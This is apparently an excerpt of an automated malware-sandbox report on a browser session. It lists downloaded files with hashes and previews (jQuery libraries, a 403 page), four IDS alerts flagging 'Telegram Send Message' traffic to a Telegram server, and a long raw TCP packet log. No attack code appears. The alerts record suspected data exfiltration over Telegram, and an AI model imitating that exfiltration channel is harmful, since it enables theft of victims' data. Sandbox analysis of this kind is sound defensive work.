                                                                                                    Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):553
                                                                                                    Entropy (8bit):4.662821081936326
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:TvgsoCVIogs01lI55aNGlTF5TF5TF5TF5TF5TFK:cEQtnstTPTPTPTPTPTc
                                                                                                    MD5:0127426BF3BA07FF7211399DDF5186C4
                                                                                                    SHA1:221D89F3261F545AC58848EBA300E0134C76FF9A
                                                                                                    SHA-256:982B986BB578E137F062099427A8CAEC3C501C84A9E4B22369EBD2BADEC42FE7
                                                                                                    SHA-512:6CEA4AB7D43A518A316120BF7AE340583E989A21FC3E142DDD71742D53A7AE6CFA276F232ACD6B6794444B28AA9A666C40171EE44341A7B9A3CA8453B61A371A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://www.southwark.anglican.org/favicon.ico
                                                                                                    Preview:<html>..<head><title>403 Forbidden</title></head>..<body>..<center><h1>403 Forbidden</h1></center>..<hr><center>cloudflare</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (32012)
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):69597
                                                                                                    Entropy (8bit):5.369216080582935
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:qNhEyjjTikEJO4edXXe9J578go6MWX2xkjVe4c4j2ll2Ac7pK3F71QDU8CuT:Exc2yjq4j2uYnQDU8CuT
                                                                                                    MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                                                                                    SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                                                                                    SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                                                                                    SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://code.jquery.com/jquery-3.2.1.slim.min.js
                                                                                                    Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                                                                                    No static file info
                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                    2025-03-10T13:51:03.968804+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.2454004149.154.167.220443TCP
                                                                                                    2025-03-10T13:51:07.264845+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.2454006149.154.167.220443TCP
                                                                                                    2025-03-10T13:51:23.348678+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.2454009149.154.167.220443TCP
                                                                                                    2025-03-10T13:51:26.479469+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.2454011149.154.167.220443TCP
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Mar 10, 2025 13:50:33.282900095 CET53974443192.168.2.24172.217.18.4
                                                                                                    Mar 10, 2025 13:50:33.282948971 CET44353974172.217.18.4192.168.2.24
                                                                                                    Mar 10, 2025 13:50:33.283032894 CET53974443192.168.2.24172.217.18.4
                                                                                                    Mar 10, 2025 13:50:33.283315897 CET53974443192.168.2.24172.217.18.4
                                                                                                    Mar 10, 2025 13:50:33.283334017 CET44353974172.217.18.4192.168.2.24
                                                                                                    Mar 10, 2025 13:50:34.961646080 CET53974443192.168.2.24172.217.18.4
                                                                                                    Mar 10, 2025 13:50:35.008343935 CET44353974172.217.18.4192.168.2.24
                                                                                                    Mar 10, 2025 13:50:35.675740957 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:35.675782919 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:35.675847054 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:35.676292896 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:35.676312923 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:35.676769018 CET53976443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:35.676810026 CET4435397650.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:35.676870108 CET53976443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:35.677140951 CET53976443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:35.677151918 CET4435397650.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:35.736027002 CET44353974172.217.18.4192.168.2.24
                                                                                                    Mar 10, 2025 13:50:35.736104965 CET53974443192.168.2.24172.217.18.4
                                                                                                    Mar 10, 2025 13:50:38.187244892 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.187796116 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.187844992 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.188793898 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.188884020 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.190233946 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.190325022 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.190458059 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.190473080 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.241408110 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.438261032 CET4435397650.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.438605070 CET53976443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.438627005 CET4435397650.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.439516068 CET4435397650.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.439599037 CET53976443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.439996004 CET53976443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.440037012 CET4435397650.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.491991043 CET53976443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.492000103 CET4435397650.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.538734913 CET53976443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.677166939 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.677196980 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.677205086 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.677269936 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.677304983 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.697274923 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.697365999 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.697402000 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.747339964 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.759061098 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.759073973 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.759104013 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.759174109 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.759228945 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.769504070 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.769512892 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.769623995 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.789845943 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.789855003 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.789944887 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.810096025 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.810105085 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.810183048 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.823667049 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.823678017 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.823774099 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.851301908 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.851315022 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.851392984 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.863816977 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.863908052 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.874473095 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.874546051 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.881984949 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.882076979 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.895219088 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.895291090 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.902767897 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.902852058 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.928745031 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.928834915 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.929953098 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.930115938 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.943500042 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.943578959 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.943994999 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.944065094 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.955492973 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.955573082 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.960237026 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.960335970 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.966815948 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.966902971 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.971322060 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.971388102 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.977750063 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.977835894 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.983839989 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.983910084 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.989789963 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.989860058 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.995138884 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.995229006 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:38.999244928 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:38.999313116 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.004730940 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.004798889 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.010037899 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.010113955 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.013292074 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.013358116 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.018328905 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.018425941 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.106806040 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.106987000 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.107806921 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.107882977 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.110424042 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.110497952 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.112961054 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.113024950 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.115361929 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.115421057 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.116985083 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.117058039 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.119425058 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.119504929 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.121834040 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.121896982 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.124186993 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.124294996 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.220195055 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.220299006 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.221836090 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.221935034 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.224168062 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.224251986 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.226533890 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.226675034 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.228185892 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.228272915 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.230557919 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.230664968 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.232880116 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.232947111 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.235877991 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.235956907 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.236841917 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.236933947 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.318232059 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.318490028 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.320743084 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.320836067 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.323451996 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.323539019 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.326095104 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.326174021 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.327334881 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.327404976 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.329535007 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.329637051 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.332480907 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.332550049 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.334244967 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.334311962 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.336924076 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.336993933 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.338087082 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.338146925 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.340997934 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.341114044 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.343866110 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.343940973 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.420243025 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.420510054 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.422264099 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.422363997 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.424051046 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.424123049 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.424498081 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.424626112 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.424889088 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.424954891 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.427169085 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.427273989 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.429625988 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.429697990 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.431133032 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.431232929 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.473726988 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.473923922 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.474216938 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.474314928 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.476187944 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.476255894 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.477834940 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.477941990 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.480024099 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.480123997 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.482484102 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.482563019 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.484962940 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.485028028 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.486418009 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.486479998 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.512540102 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.512820959 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.528608084 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.528757095 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.530782938 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.530858994 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.532377958 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.532444000 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.534826040 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.534899950 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.537198067 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.537261009 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.539052010 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.539139986 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.541991949 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.542052984 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.543452978 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.543531895 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.565320969 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.565592051 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.586905003 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.587201118 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.589334011 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.589432001 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.591686964 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.591768980 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.593329906 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.593406916 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.595679998 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.595757961 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.598045111 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.598119020 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.603458881 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.603535891 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.619745016 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.619986057 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.620536089 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.646095991 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.646203041 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.647114992 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.647197008 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.650134087 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.650197983 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.652663946 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.652734041 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.655445099 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.655559063 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.657012939 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.657080889 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.659298897 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.659384966 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.662089109 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.662152052 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.679894924 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.680012941 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.691410065 CET4435397550.62.201.28192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.691498041 CET53975443192.168.2.2450.62.201.28
                                                                                                    Mar 10, 2025 13:50:39.692703962 CET4435397550.62.201.28192.168.2.24
